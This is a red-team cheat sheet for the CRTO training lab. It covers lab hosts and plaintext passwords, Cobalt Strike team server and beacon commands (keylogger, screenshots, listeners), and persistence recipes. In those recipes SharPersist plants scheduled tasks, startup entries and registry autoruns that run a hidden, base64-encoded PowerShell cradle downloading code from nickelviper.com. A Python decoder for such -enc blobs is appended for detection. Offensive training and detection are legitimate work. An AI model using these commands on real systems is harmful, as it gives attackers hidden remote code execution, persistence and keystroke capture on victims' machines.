# CRTO Cheat Sheet

## Lab info

### Hosts

| IP | Name | Hostname |
| --- | --- | --- |
| 10.10.255.244, 10.10.254.244 | AdminBox | |
| 10.10.5.40 | Attacker Desktop | DESKTOP-3BSK7NO |
| 10.10.5.50 | Attacker Linux | ubuntu |
| 10.10.122.10 | Domain Controller 2 | dc-2.dev.cyberbotic.io |
| 10.10.120.100 | Elastic Stack | elk.cyberbotic.io |
| 10.10.120.20 | Exchange Server | mail.cyberbotic.io |
| 10.10.122.15 | File Share | fs.dev.cyberbotic.io |
| 10.10.151.10 | MSP DC | ad.msp.org |
| 10.10.5.250 | PowerDNS | powerdns |
| 10.10.120.30 | SCM Server 1 | scm-1.cyberbotic.io |
| 10.10.120.25 | SQL Server 1 | sql-1.cyberbotic.io |
| 10.10.122.25 | SQL Server 2 | sql-2.cyberbotic.io |
| 10.10.122.254 | Squid Proxy | squid.dev.cyberbotic.io |
| 10.10.150.10 | Studio DC | dc.dev.studio.com |
| 10.10.122.30 | Web Server | web.dev.cyberbotic.io |
| 10.10.123.101 | Workstation 1 | wkstn-1.dev.cyberbotic.io |
| 10.10.123.102 | Workstation 2 | wkstn-2.dev.cyberbotic.io |

### Credentials

| Username | Password | Hostname | Domain | Comments |
| --- | --- | --- | --- | --- |
| bfarmer | Sup3rman | | dev.cyberbotic.io | |
| jking | Qwerty123 | | dev.cyberbotic.io | |
| nlamb | F3rrari | | dev.cyberbotic.io | |
| nglover | BenNev!s | | cyberbotic.io | |

## Cobalt Strike

### Team Server

#### From terminal

```bash
# Run inside tmux so the team server survives the SSH session
sudo ./teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile
```

#### As a Service

```bash
sudo nano /etc/systemd/system/teamserver.service
```

```ini
[Unit]
Description=Cobalt Strike Team Server
After=network.target
StartLimitIntervalSec=0

[Service]
Type=simple
Restart=always
RestartSec=1
User=root
WorkingDirectory=/home/attacker/cobaltstrike
ExecStart=/home/attacker/cobaltstrike/teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile

[Install]
WantedBy=multi-user.target
```

```bash
sudo systemctl daemon-reload
sudo systemctl status teamserver.service
```

```bash
sudo systemctl start teamserver.service
sudo systemctl stop teamserver.service
```

```bash
sudo systemctl enable teamserver.service
sudo systemctl disable teamserver.service
```

### Beacon

```bash
# Basic
sleep <seconds> <jitter>                      # e.g. sleep 5 50
connect <target>
execute-assembly <path-tool> <params-tool>    # Execute a .NET binary in the remote Beacon
run netstat -anop tcp                         # View listening ports
jobs
jobkill <jid>

# Recon
net logons
clipboard
keylogger
printscreen
screenshot
screenwatch

# DNS Beacon
checkin                                       # Send the Beacon's metadata/info back
```

### Listeners

| name | payload | host | port | bindto | beacons | profile |
| --- | --- | --- | --- | --- | --- | --- |
| dns | windows/beacon_dns/reverse_dns_txt | pics.nickelviper.com | 53 | | pics.nickelviper.com | default |
| http | windows/beacon_http/reverse_http | nickelviper.com | 80 | | nickelviper.com | default |
| smb | windows/beacon_bind_pipe | | TSVCPIPE-8ff80863-eb68-48ad-b397-34ae76d3577e (change the last 4 characters) | | | |
| tcp | windows/beacon_bind_tcp | | 4444 | | 0.0.0.0 | |
| tcp-local | windows/beacon_bind_tcp | | 4444 | | 127.0.0.1 | |

## Recon

### Host

```bash
execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe -group=system
```

## Persistence

### b64 Payload

PowerShell expects `-enc` arguments as base64 of the UTF-16LE encoding of the script, so the same string must be encoded that way on either platform.

PowerShell: generate the base64 string

```powershell
$str = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'
[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
```

Linux: generate the base64 string

```bash
str='IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'
# printf avoids a trailing newline; iconv produces the UTF-16LE bytes PowerShell expects
printf '%s' "$str" | iconv -t UTF-16LE | base64 -w 0
```

### Task Scheduler

Beacon

```bash
execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA" -n "Updater" -m add -o hourly
```

- `-t` is the desired persistence technique.
- `-c` is the command to execute.
- `-a` are any arguments for that command.
- `-n` is the name of the task.
- `-m` is to add the task (you can also remove, check and list).
- `-o` is the task frequency.

### Startup Folder

Beacon

```bash
execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA" -f "UserEnvSetup" -m add
```

### Registry AutoRun

Beacon

```bash
cd C:\ProgramData
upload C:\Payloads\http_x64.exe
mv http_x64.exe updater.exe
execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t reg -c "C:\ProgramData\Updater.exe" -a "/q /n" -k "hkcurun" -v "Updater" -m add
```

## MS SQL Server

```bash
powershell-import C:\Tools\PowerUpSQL\PowerUpSQL.ps1
```
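The b64 Payload and Task Scheduler sections above show how the `-enc` argument is built: base64 over the UTF-16LE bytes of the script. The reverse operation is what a defender needs when a scheduled task action, startup entry or process-creation event only shows the blob. This is an added example, not code from the cheat sheet or from SharPersist; the function names, the marker list and the sample task action are my own constructions (the sample reuses the blob from the page).

```python
"""Decode PowerShell -EncodedCommand blobs found in logged command lines."""
import base64
import re

# Matches -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENC_RE = re.compile(r"-(?:enc|encodedcommand|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Substrings that mark a download cradle or a hidden window; tune to taste.
CRADLE_MARKERS = ("iex", "invoke-expression", "downloadstring", "net.webclient", "-w hidden")

# Constructed sample: the task action from the cheat sheet as it would appear in a
# scheduled-task export or a process-creation event.
SAMPLE_TASK_ACTION = (
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden -enc "
    "SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAu"
    "AGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkA"
    "cABlAHIALgBjAG8AbQAvAGEAIgApACkA"
)


def decode_encoded_command(blob: str) -> str:
    """base64 -> UTF-16LE text, the inverse of [Convert]::ToBase64String(Unicode.GetBytes())."""
    raw = base64.b64decode(blob, validate=True)   # raises on non-base64 input
    return raw.decode("utf-16-le")                # raises on an odd byte count


def analyze_command_line(cmdline: str) -> dict:
    """Return {} when there is no -enc argument; otherwise the decoded script and hit markers."""
    match = ENC_RE.search(cmdline)
    if not match:
        return {}
    try:
        script = decode_encoded_command(match.group(1))
    except (ValueError, UnicodeDecodeError):
        # Malformed blob: still worth surfacing, since a valid -enc should always decode
        return {"decoded": None, "markers": [], "error": "undecodable blob"}
    haystack = (cmdline + " " + script).lower()   # markers can sit in either layer
    return {"decoded": script, "markers": [m for m in CRADLE_MARKERS if m in haystack]}


if __name__ == "__main__":
    result = analyze_command_line(SAMPLE_TASK_ACTION)
    print("decoded:", result["decoded"])
    print("markers:", ", ".join(result["markers"]))
```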